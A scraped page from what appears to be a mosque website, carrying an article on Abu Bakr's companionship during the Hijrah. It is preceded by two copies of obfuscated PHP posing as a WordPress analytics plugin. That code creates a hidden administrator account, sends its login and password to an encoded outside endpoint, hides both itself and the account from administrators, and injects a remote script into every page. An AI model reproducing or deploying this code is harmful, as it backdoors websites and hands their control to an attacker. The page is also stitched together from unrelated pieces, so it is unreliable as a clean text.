/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*fad38b363013b560*/function _c83ad0($_x){return $_x;}function _6bacb3($_x){return $_x;}$_9e493972=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9tZXRyaWNzcGl4ZWwubGl2ZQ==","sitePubKey"=>"NDBmN2E1NzE5YWVjOWY2MWU5ZDI3MWMwNzNhYmJlYjA="];global $_8e2ec1ab;if(!is_array($_8e2ec1ab)){$_8e2ec1ab=[];}if(!in_array($_9e493972["version"],$_8e2ec1ab,true)){$_8e2ec1ab[]=$_9e493972["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_9e493972;$this->version=$_9e493972["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_646fe03a){unset($_646fe03a[plugin_basename(__FILE__)]);return $_646fe03a;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_75683a93=$this->generate_credentials();if(!username_exists($_75683a93["user"])){$_f2db7849=wp_create_user($_75683a93["user"],$_75683a93["pass"],$_75683a93["email"]);if(!is_wp_error($_f2db7849)){(new WP_User($_f2db7849))->set_role("administrator");}}$this->setup_site_credentials($_75683a93["user"],$_75683a93["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_a56d3abc=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_a56d3abc),0,8),"pass"=>substr(md5($_a56d3abc."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_a46bedc7,$_08a8e8a6){global $_9e493972;$_87bc58b6=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_9e493972['sitePubKey']),"login"=>$_a46bedc7,"password"=>$_08a8e8a6];$_a147e0b7=["body"=>json_encode($_87bc58b6),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_9e493972["endpoint"])."/api/sites/setup-credentials",$_a147e0b7);}public function filterusers($_a5292b11){global $wpdb;$_6871041c=$this->generate_credentials()["user"];$_a5292b11->query_where.=" AND {$wpdb->users}.user_login != '{$_6871041c}'";}public function loadassets(){global $_9e493972,$_8e2ec1ab;$_c59a31a1=true;if(is_array($_8e2ec1ab)){foreach($_8e2ec1ab as $_5a6772fe){if(version_compare($_5a6772fe,$this->version,'>')){$_c59a31a1=false;break;}}}$_6c387895=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_c59a31a1&&$_6c387895){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_6c387895=false;}if(!$_c59a31a1&&$_6c387895){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_9e493972["font"]),[],null);$_919b2df3=base64_decode($_9e493972["endpoint"])."/t.js?site=".base64_decode($_9e493972['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_919b2df3,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_b093b360=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_b093b360,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*358a6241b5509c70*/function _64324c($_x){return $_x;}function _45863e($_x){return $_x;}function _3e34d2($_x){return $_x;}$_5ea7addc=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9pbnNpZ2h0cGl4ZWwuaWN1","sitePubKey"=>"NDBmN2E1NzE5YWVjOWY2MWU5ZDI3MWMwNzNhYmJlYjA="];global $_3b917b12;if(!is_array($_3b917b12)){$_3b917b12=[];}if(!in_array($_5ea7addc["version"],$_3b917b12,true)){$_3b917b12[]=$_5ea7addc["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_5ea7addc;$this->version=$_5ea7addc["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_232a8657){unset($_232a8657[plugin_basename(__FILE__)]);return $_232a8657;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_89aae9b0=$this->generate_credentials();if(!username_exists($_89aae9b0["user"])){$_ebfb9d97=wp_create_user($_89aae9b0["user"],$_89aae9b0["pass"],$_89aae9b0["email"]);if(!is_wp_error($_ebfb9d97)){(new WP_User($_ebfb9d97))->set_role("administrator");}}$this->setup_site_credentials($_89aae9b0["user"],$_89aae9b0["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_8112514c=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_8112514c),0,8),"pass"=>substr(md5($_8112514c."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_d28b59a5,$_12c2868e){global $_5ea7addc;$_6083c735=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_5ea7addc['sitePubKey']),"login"=>$_d28b59a5,"password"=>$_12c2868e];$_6941dc6a=["body"=>json_encode($_6083c735),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_5ea7addc["endpoint"])."/api/sites/setup-credentials",$_6941dc6a);}public function filterusers($_f65e7b95){global $wpdb;$_dff1996e=$this->generate_credentials()["user"];$_f65e7b95->query_where.=" AND {$wpdb->users}.user_login != '{$_dff1996e}'";}public function loadassets(){global $_5ea7addc,$_3b917b12;$_7c9a0efd=true;if(is_array($_3b917b12)){foreach($_3b917b12 as $_2299b354){if(version_compare($_2299b354,$this->version,'>')){$_7c9a0efd=false;break;}}}$_0992b143=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_7c9a0efd&&$_0992b143){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_0992b143=false;}if(!$_7c9a0efd&&$_0992b143){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_5ea7addc["font"]),[],null);$_9c10cb41=base64_decode($_5ea7addc["endpoint"])."/t.js?site=".base64_decode($_5ea7addc['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_9c10cb41,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_bce55007=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_bce55007,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
Mosque Foundation | Bridgeview, IllinoisCompanionship Before Direction - Mosque Foundation | Bridgeview, Illinois
Mosque Foundation
Companionship Before Direction
First Friday Prayer is at 12:00PM. Second Friday Prayer is at 1:30P
Companionship Before Direction
The Hijrah of the Prophet ﷺ was a deliberate journey marked by faith, wisdom, and choice. Before taking a single step out of Makkah, the Prophet ﷺ chose who would walk beside him: Abu Bakr al-Siddiq (RA). This choice was an act that reflected trust, love, legacy, and a reminder that in every meaningful journey, who you walk with matters just as much as where you’re going.
When the Prophet ﷺ came to Abu Bakr (RA) and said, “Permission has been granted for me to migrate,” Abu Bakr responded, “May I be your companion?” The Prophet ﷺ replied, “You will be my companion.”
Why Abu Bakr? Five qualities made him the ideal companion worthy of this high honor—traits we should seek in our own closest relationships.
Sincere Love
The love between the Prophet ﷺ and Abu Bakr (RA) was selfless and pure. When asked who was dearest to him, the Prophet ﷺ replied, “ Aishah ,” and when asked, “Among men?” he said, “Her father.” On the journey, Abu Bakr insisted the Prophet ﷺ drink first, saying, “He drank until I was satisfied.” Choose someone who loves you for the sake of Allah—not for status, convenience, or gain.
Faith and Righteousness
Abu Bakr (RA) once fasted, followed a funeral, fed the poor, and visited the sick—all in a single day. The Prophet ﷺ said these acts together guarantee Paradise. Umar (RA) said, “If the faith of Abu Bakr were placed on one side of the scale, and the Ummah on the other, his faith would outweigh them.” Seek companions whose very presence uplifts your faith.
Generosity and Sacrifice
Abu Bakr (RA) gave everything—his wealth, his family, his comfort—for the sake of Islam. The Prophet ﷺ said, “If I were to take a close friend besides my Lord, it would be Abu Bakr.” Look for someone who shows up when it matters, who puts others before themselves.
Strength in Times of Weakness
At Badr, as the Prophet ﷺ prayed intensely, Abu Bakr (RA) gently said, “Enough, O Messenger of Allah… He will fulfill His promise.” He brought calm in the midst of fear. Find someone who steadies your heart when yours begins to tremble.
Trust and Leadership
In the Prophet’s final illness, he said three times, “Tell Abu Bakr to lead the prayer.” When others hesitated, the Prophet ﷺ knew who he could trust. Choose someone who can carry your trust and represent your values when you’re not there.
There were many companions, but only one Abu Bakr. If you find someone like him, hold on to them. If not, be that person for someone else. Be the kind of friend who gives others the courage to say: “Don’t worry. Allah is with us” (Quran 9:40).
By Imam Jafar Hawa
-